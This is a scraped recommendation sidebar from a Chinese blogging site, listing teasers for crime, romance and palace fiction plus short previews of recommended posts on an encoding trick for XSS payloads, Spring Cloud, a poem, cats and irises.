  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,095评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,448评论 2 325
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,566评论 1 339
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,253评论 4 328
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,829评论 3 312
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,715评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,945评论 1 264
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,248评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,440评论 2 348

推荐阅读更多精彩内容

  • 原始paylaod unicode编码函数名alert url编码unicode编码部分 最后在html编码全部 ...
    zwalts阅读 2,152评论 0 0
  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 134,626评论 18 139
  • 燕子展翅,雄鹰翱翔, 那是鸟儿对蓝天的向往; 小溪潺潺,波浪滚滚, 那是河流对海洋的歌唱; 稻谷飘香,硕果累累, ...
    陌路独白阅读 609评论 2 3
  • 首先,你要有一只猫. 哈哈,好吧,请忽略我的开头. 一朝进入养猫坑,再也拔不出来.以前鄙视晒娃的人,现在自己还没有...
    离落in阅读 5,528评论 11 25
  • 每年五月,鸢尾花便将春的消息传到远方。法兰西王国第一个王朝的国王克洛维在受洗礼时,上帝送给他一件礼物就是鸢尾花,俗...
    奕秋read阅读 16,489评论 6 8